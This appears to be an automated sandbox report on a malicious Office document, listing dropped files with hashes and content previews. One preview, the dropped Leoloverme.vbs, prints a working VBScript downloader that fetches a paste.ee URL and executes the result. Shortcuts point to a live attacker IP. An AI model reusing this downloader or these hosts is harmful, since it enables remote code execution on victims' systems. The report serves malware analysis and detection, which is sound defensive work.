SHA-256:	22B44EA448DBC447CCCD794A39ACD8CD9342ADFE26DED3167151CC1028F8D960
SHA-512:	2906A821B0BD62AD3566AD3B861FD426C26E89F6E81CA011D8A51C81BB93184C35B54859AE792B023D0DB64B298B054233731FCC445F048EB509B382EAE30DD3
Malicious:	true
Preview:	..t.a.p.i.r.i.b.a. .=. . .(.I.n.t.(.(.a.f.r.i.c.a.n.i.s.t.a.-.g.a.l.a.c.r.i.s.t.a.+.1.).*.R.n.d.+.g.a.l.a.c.r.i.s.t.a.).).....S.e.t. .i.n.q.u.i.l.i.n.a.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....i.n.q.u.i.l.i.n.a.r...O.p.e.n. .".G.E.T.".,.".h.t.t.p.:././.p.a.s.t.e...e.e./.d./.k.m.R.F.s.".,. .F.a.l.s.e.....i.n.q.u.i.l.i.n.a.r...S.e.n.d.....a.r.r.e.b.a.t.a.d.o.r. .=. .i.n.q.u.i.l.i.n.a.r...R.e.s.p.o.n.s.e.T.e.x.t.....s.o.l.e.n.o.d.o.n.t.e. .a.r.r.e.b.a.t.a.d.o.r.....F.u.n.c.t.i.o.n. .s.o.l.e.n.o.d.o.n.t.e.(.r.o.n.c.o.l.h.o.).....E.x.e.c.u.t.e.G.l.o.b.a.l. .r.o.n.c.o.l.h.o.....E.n.d. .F.u.n.c.t.i.o.n.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A37739B.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	884312
Entropy (8bit):	1.2944965349348616
Encrypted:	false
SSDEEP:	1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
MD5:	9ABE7EB352E0DB96B52C99AC2FDEA85F
SHA1:	8DC45D02308275BA32B7FFB320A3042256D40C8B
SHA-256:	EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
SHA-512:	E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
Malicious:	false
Preview:	....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E5F5854.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	330948
Entropy (8bit):	4.9760983149391524
Encrypted:	false
SSDEEP:	3072:W0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:W0Bd8yCKdQRzw4muaZ9TARfMDcFi
MD5:	A5966F1B94BAD37B32CB2D020D694D0B
SHA1:	1FA8FFE397A0E8BEE47EB459FE356A63581136D4
SHA-256:	93100993C347C5746E3620BF99C712D249E2057606B54632FCAEABDF5201806D
SHA-512:	15533F82EB611A1E03B879019CBE6B41C0209086C5285B79CBFE7CEA891B6A6C83AC913DCE37DDF61F96D7809C998DB3FB005103806B2808140DA3D45D9B17DF
Malicious:	false
Preview:	....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83CF445.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	34832
Entropy (8bit):	2.9170351546937883
Encrypted:	false
SSDEEP:	384:UCK6Royw05EBi9dFiQXyjBNwpm0H76ATMFiD59nU:U2QBapFHmCOeXU
MD5:	3FF82A9B8DC4B19B0666C288CFA107DA
SHA1:	D76119A1F5F3FC8FDD254F8EE2090C7B2C3FD0C1
SHA-256:	99B62B883D54B99640CD8AE2206DE9BB36E05D5258AA77224E5E698F66B9C75E
SHA-512:	AB629965EC258D45F9DC7E9DEF2079C15D24AD03F4B81328F84BE7003E6F134C9383C2964A476C31BC676E9BD656EEA669B3A10A8C7F102440C52736C3E7F0FF
Malicious:	false
Preview:	....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ISO-8859 text, with very long lines (7451), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	69960
Entropy (8bit):	3.1658377904674895
Encrypted:	false
SSDEEP:	1536:MT7P5PjYFb39aHozRjXkz4lY8ii+AMQKpE:KR0PdjpY8iitMtE
MD5:	7DC524B6306D0D04114C3385CD20DA18
SHA1:	7F90E09D279D429C3D4C9363BC99DAB18BEC387B
SHA-256:	124BA73A2974E50A6E6DFD748A826FF5330FB8609DC7332788815B4E089F6DC2
SHA-512:	5ABAA6D73EFFAD4D2A64D66EA1B76B90653EBBDE442128D36679E34E8F9EE5D9E3D9874381F9317DDD857094EFC1B446D66254E6A7785B6FA4EFE31592E50E37
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt...........{\\bWModeBW539536352 \!}.{\644337887?_[7..#0)4?]@<%2?[:@[%><]#>&9..&79?!9`.[?92?,-.\|/79,:!_^$>^7%%3^;]?.&17<1%+2.5!?&?@+4(341&)?0?8+^.&[@?$]^;4;%!9@8+9~7_(636>0##([)9.?-5.82:7.?+?+?0&^&9?.9?-#?@.=@194.26-!(/.$68/%?>5?%&(8.<&-;),]](4^&/0-3[2!>@0$%()?%2\|$??(.?@3_9?\|3.`?]./\|!@@~4.7##-(.?\|?-%`3?[!;)%)81.:`5%=?+%?5#$.-?!?(?>;???..6:-?`?8.[<>%;<.%[7.~&.?';?3%:._%`??6?]/'@&$8?1@>'%?~(?!?$+?#?.._8<1?6.)]~:=%.?7.)).^.?+`^+38).1..+?9%6(?&%,13;'+8^6%?,!@.?..~?,7?/=@&9(4.4->'29&!.%_8<<?[<#%4??5?9.:'`>4;%=.-.?'./0=;/,?,-!60(.?_,_.7@>9]7.%#)3%1%.$5$~?>,..4]=?.5.>8[?;:6]&><$>.;$~@6%8&??15[,5%7_^#.%8.+`$;_1?\|[,.~%[<~...8@80$(5<3)3`?]@@]?~5/@?=)(^47?19%!;/[8(..2.5?[)/.49;5???)59!36<+?<0:/%)-9_%.??<!;4$.>\|5%?.`[??]%1(82<3]7;7]?.%3$3+[+3.,:^##0;>..(&;/>(/]6>8%08-%@^76?=&4:?@?=%`+-63]</[@%\|6?5>-\|].(.'),[...,30+3(.]=3?,.5?3@9,]+7-@..:[4%.[[[&?>):.<4?&%?/^?<?;]7../?]!:5.56,%!_??%5^#?$`7^@<.>]*,[$=&&&/3=`%1:.%`1.8=%?26?^$9'+10`1%5]5(]<['.>[/$$.3%?\|01`?]4==-.&`.?[47??#2&<5?]

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF28E582.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.5598195116789372
Encrypted:	false
SSDEEP:	768:tfV2z1TFc+NqqwY2vAIqdFJNTTCKakQyHkHcv006aq4/49qXYeNDFIrxWz5eYGoA:twxB9CK4I0IJXYODScNd8jkQ
MD5:	197D701BE1DF99B08087A2BFBF7E08BB
SHA1:	D89B035A0C283D1C3C4AF3CD443F9B67A25DD144
SHA-256:	812AC6359E77B09B88A96DA0EEBF1E29651798C7F2155489FE165209EDBFC791
SHA-512:	10FCCFB459011ECE38EFEA1F91CBEE41A4517B1954358220E05133F1CA024C0DBD9B188C54E6590F703B1F926EA39F5C51ABC582BB6664719BBD5C715AF954FB
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A088A985-E6D5-4349-B475-13037637E9EB}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	5.507006171074283
Encrypted:	false
SSDEEP:	96:VIfs5m1cQ7YMIKLyVWlYXrYqm1cQ7YMIKLyVWlYX:Vh5RqImdl2EqRqImdl2
MD5:	3E03C2226B2753615B047A1D85FBE29A
SHA1:	E29E10AA233CF41ACAC4A466B7965C29F0DF350C
SHA-256:	3B9BE72E233FEC3FD946E6D24B7493AACF38A9C8091BE517575C6BDB94E0F692
SHA-512:	F071B30D5F67CEC1FA9A2638626C10A635C88F719BD9B84FEBB5F3FC687E22CBAD5F26E07D67B18D88B33B3282C9A97A0552F926DA086B841AE76499CCD79D51
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92A54BF7-4CBB-4C14-8FA2-A6A7120CDA0D}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15842
Entropy (8bit):	3.6175149125691144
Encrypted:	false
SSDEEP:	384:dK6zTEAw2LMCwhXbKrC8KRX15961ClH9hiBrQL5orJ:nTJeJtNRLd9hi9Q1orJ
MD5:	F4711998A61C120CCB295A7913FAF448
SHA1:	0FEF585ECD618DAE1E3A36BCBA3B52704DFD1EE3
SHA-256:	E57F2D737428118F0A8CC8ABD16FC1D96DFEA53BE9EEDE6E3FE09FAE17A17DD6
SHA-512:	9FCB8A612E23C363598030484855A75D1E6AECF13407E654DF83349891ABB2A713834170D3F5B3C7782A86F095BAC4F794E329FD5DA772BD7975464874301823
Malicious:	false
Preview:	....................4.4.3.3.7.8.8.7.?._.[.7.....#.0.).4.?.].@.<.%.2.?.[.:.@.[.%.>.<.].#.>.&.9.....&..7.9.?.!.9.`...[.?.9.2.?.,.-...\|./.7.9..,.:.!._.^.$.>..^.7.%.%.3.^.;.].?...&.1.7.<.1.%.+.2...5.!.?.&.?.@.+.4.(.3.4.1.&.).?.0.?.8.+.^...&.[.@.?.$.].^.;.4.;.%.!.9.@.8.+.9.~.7._.(.6.3.6.>.0.#..#.(.[.).9...?..-.5...8.2.:.7...?.+.?.+.?.0.&.^.&.9.?...9.?.-.#.?.@...=.@.1.9.4...2.6.-..!.(./...$.6.8./.%.?.>.5.?.%.&.(.8...<.&.-.;.).,.].].(.4.^.&./.0.-.3.[.2.!.>.@.0.$.%.(.).?.%.2.\|.$.?.?.(...?.@.3._.9.?.\|.3...`.?.].../.\|.!.@.@.~.4...7.#.#.-.(...?.\|.?.-.%.`.3.?.[.!..;.).%.).8.1...:.`.5.%.=.?.+.%.?.5.#.$...-.?.!.?.(.?.>.;.?.?.?.....6.:.-.?.`.?.8...[.<.>.%.;.<...%.[.7...~.&...?.'.;.?.3.%.:..._.%.`.?.?.6.?.]./.'.@..&.$.8.?.1.@.>.'.%.?.~.(.?.!.?.$.+.?.#.?....._.8.<.1.?.6...).].~.:.=.%....?.7...).)...^...?.+.`.^.+.3.8.)...1.....+.?.9.%.6.(.?.&.%.,.1.3.;.'.+.8.^.6.%.?.,.!.@...?.....~.?.,.7.?../.=.@.&.9.(.4...*.4.-.>.'.2.9.&.!...%._.8.<.<.?.[.<.#.%.4.?.?.5.?.9...:.'.`.>.4.;.%.=...-...?.'.../.0.=.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4D04A7A-7B6F-479B-B352-77D6440F4D71}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1acda15a.i4e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\5dhjdumq.ytq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\5iddx2dw.sev.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\fmm52c5c.vyj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\{457C84DF-1FD0-474A-9718-F6AFF1345228}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02559429816733194
Encrypted:	false
SSDEEP:	6:I3DPcNWFvxggLRr4EgtwltRXv//4tfnRujlw//+GtluJ/eRuj:I3DPauH2tQTvYg3J/
MD5:	5B61F8032C96EDA9EE9065554401938A
SHA1:	BDBAE092E7FEEDEC04EC2DD6358D2CD388BB22C5
SHA-256:	BBA7E08DF01AF6F105BB6012152A70C1D8351B21B340924B14F4494765DA80AB
SHA-512:	30F72DC0F21E46785D1EE5C7C53AF20FD0B9D4BCFF75538380F0465D9D654DB27EF7EE31C327D2834E23E82C47F68B290EF5BA1E9446DABD7313448986154E96
Malicious:	false
Preview:	......M.eFy...z..^\.."G.X.f.l..S,...X.F...Fa.q............................\|..\|..K...V..}........T...;..E......N.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{FA908E24-6FF0-457B-B664-201A8B976723}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02563227505048538
Encrypted:	false
SSDEEP:	6:I3DPcwDm1HvxggLRVzyzp3/RXv//4tfnRujlw//+GtluJ/eRuj:I3DP3DmRh23pvYg3J/
MD5:	6454A81AC770C95A5838F6E6C923CD45
SHA1:	2AFA51262467CB201EDADCF437E5392BE00C8A71
SHA-256:	A865C1DE2F903184310E1502814A559557BA8B7D5AED431BD3B032A5DBC6DD9A
SHA-512:	B3B53FE4430647DAA52D565FC45542BE293AF3A24E32187AD0DD8B123F5CC39773DE515EF5EEC85F2055165B430946458B20545561B8927D157FAC0DAB755688
Malicious:	false
Preview:	......M.eFy...z..Y..5gJ...4....S,...X.F...Fa.q...............................*.Y.O. .'mW.d........t....}eN.P.W.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF96697D1024044DC5.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	6.682101945294003
Encrypted:	false
SSDEEP:	192:+J3uQOwAvsXfzgQERE02cOlu8q+K6fs0Icr7QqSc3QIvn0eek4kSy:O2sXk72cOlu2fs5cPEct0e743
MD5:	5812C36D72BD2AD03C9DEF26B2CA3D6E
SHA1:	9DDF8F5BD2C4635812D91D23826D192A93DACA5A
SHA-256:	5F8266EF1D7C88A84C018D7D33A704ADF075EB420A609DDDDC123DAE35BA68A7
SHA-512:	1B2BDDA7A125128F6940D8DCB54BC1C0B89CD57364BC0CBA76DF63D76B67795C797AB59C5F43B46DBCBBBEF38B0894EAC74DB9D144B0C03695298A95078A3538
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA1479DB47EB451DD.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	143360
Entropy (8bit):	6.3459471813277215
Encrypted:	false
SSDEEP:	3072:4pIYYFxEtjPOtioVjDGUU1qfDlaGGx+cugLX0d62wE/zDiamh3mJUSLr/c3V8VFV:/xEtjPOtioVjDGUU1qfDlavx+fgLX0d9
MD5:	819ACAC17B67542561A187BAE474DAF4
SHA1:	2DE574F6F24E4EFFD5AB3010CC2636CF17ADD9FA
SHA-256:	AF2FFA4B28C8A80167F2B08968D327F4E11F1744E3C6930FBBC3A5031D6B186C
SHA-512:	C251CAD80BB03413814639ADC4D682B5697C0561204004B27CFB1346D16B931B0E9D4135A3C5BAF5DE2046587528637D815952C5CA2D0308C0E050BE834C4323
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.6739662216458647
Encrypted:	false
SSDEEP:	12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
MD5:	C61F99FE7BEE945FC31B62121BE075CD
SHA1:	083BBD0568633FECB8984002EB4FE8FA08E17DD9
SHA-256:	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
SHA-512:	46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
Malicious:	false
Preview:	....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.\|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	0.7532185028349225
Encrypted:	false
SSDEEP:	48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
MD5:	520FE964934AF1AB0CEBA2366830D0FA
SHA1:	B90310ACA870261CB619FDFD1E54E1B1A25074FF
SHA-256:	DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
SHA-512:	A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
Malicious:	false
Preview:	...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$.....e...F....f.qo.]...B1{.8.%%..,...;.\|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.\|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.\|.0..$<bC.G........~];..D.\|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b\|..B.]-]jk....PQZ..T}..M.S...88......?.$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb..........g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Leoloverme.vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	658
Entropy (8bit):	3.4835285911495704
Encrypted:	false
SSDEEP:	12:QB17eGmv3zkv7p0++OElgnS9O1tYZ69gDxB1twgDxffFf8fZ:Q/efvjk900E6Pvk6SDxZdDxHFf8fZ
MD5:	9758069476341CB14BC61730BA7AE82C
SHA1:	551349E0C347A85CA37A37511EFF82CC25A8C2CA
SHA-256:	22B44EA448DBC447CCCD794A39ACD8CD9342ADFE26DED3167151CC1028F8D960
SHA-512:	2906A821B0BD62AD3566AD3B861FD426C26E89F6E81CA011D8A51C81BB93184C35B54859AE792B023D0DB64B298B054233731FCC445F048EB509B382EAE30DD3
Malicious:	true
Preview:	..t.a.p.i.r.i.b.a. .=. . .(.I.n.t.(.(.a.f.r.i.c.a.n.i.s.t.a.-.g.a.l.a.c.r.i.s.t.a.+.1.).*.R.n.d.+.g.a.l.a.c.r.i.s.t.a.).).....S.e.t. .i.n.q.u.i.l.i.n.a.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....i.n.q.u.i.l.i.n.a.r...O.p.e.n. .".G.E.T.".,.".h.t.t.p.:././.p.a.s.t.e...e.e./.d./.k.m.R.F.s.".,. .F.a.l.s.e.....i.n.q.u.i.l.i.n.a.r...S.e.n.d.....a.r.r.e.b.a.t.a.d.o.r. .=. .i.n.q.u.i.l.i.n.a.r...R.e.s.p.o.n.s.e.T.e.x.t.....s.o.l.e.n.o.d.o.n.t.e. .a.r.r.e.b.a.t.a.d.o.r.....F.u.n.c.t.i.o.n. .s.o.l.e.n.o.d.o.n.t.e.(.r.o.n.c.o.l.h.o.).....E.x.e.c.u.t.e.G.l.o.b.a.l. .r.o.n.c.o.l.h.o.....E.n.d. .F.u.n.c.t.i.o.n.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\CLO on 91.92.244.96.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://91.92.244.96/LEO/CLO/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.655182354288394
Encrypted:	false
SSDEEP:	3:HRAbABGQYm//ocTd1D:HRYFVm//BTvD
MD5:	948A47270AC041B7ED50DAB568793727
SHA1:	9446683862CD82639D97469566ACB0009F118E8D
SHA-256:	FF37EFA13A84455E85084B3BC612B38E76FC1B4C76EAC8FFB269DE6331A3130E
SHA-512:	1CA5D89C8F427169A853713652B6CFAD3E9E2446EA5E6E27260D31A26844D600193C9250BB576881A50C3427F1E9AF6FC26E0C23D25CD4F4169C8D7CCA19E2EA
Malicious:	true
Preview:	[InternetShortcut]..URL=http://91.92.244.96/LEO/CLO/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	159
Entropy (8bit):	4.806518275904249
Encrypted:	false
SSDEEP:	3:WvxA1wBG6WokSQVBUOw7XuRM6IpRD/dzDr8t68LLcT0:ROBBWokSnOIj/7dzDrGoT0
MD5:	4CE370FEEB6884D4D984DCF872244263
SHA1:	60B2DB80A459C954BD104AA4ACD1062357058ACD
SHA-256:	C4740C28FA0AF509B7E59E53EC116AB61C113D53F0BEF33805B4421C58E7F49F
SHA-512:	8665E2C49A00DDCCF9FC10CCE685E28B9856F7B2408F73D5E318BD5F6DF837717925FF73F69F70E47C392AE6BBAB475416FEBB6A798C7F0BABA51E9A8CFC7AA6
Malicious:	false
Preview:	[doC]..microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC.url=0..[folders]..CLO on 91.92.244.96.url=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfastert>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.8626209019525275
Encrypted:	false
SSDEEP:	3:HRAbABGQYm//ocTd1rcEwBG6WokSQVBUOw7XuRM6IpRD/d6:HRYFVm//BTvrc/BBWokSnOIj/7d6
MD5:	C3F1BD19C5C8F01B7CA3C8C9F0012CD5
SHA1:	0E7ED60E7701BEF010806697CCE82F5A01B1144E
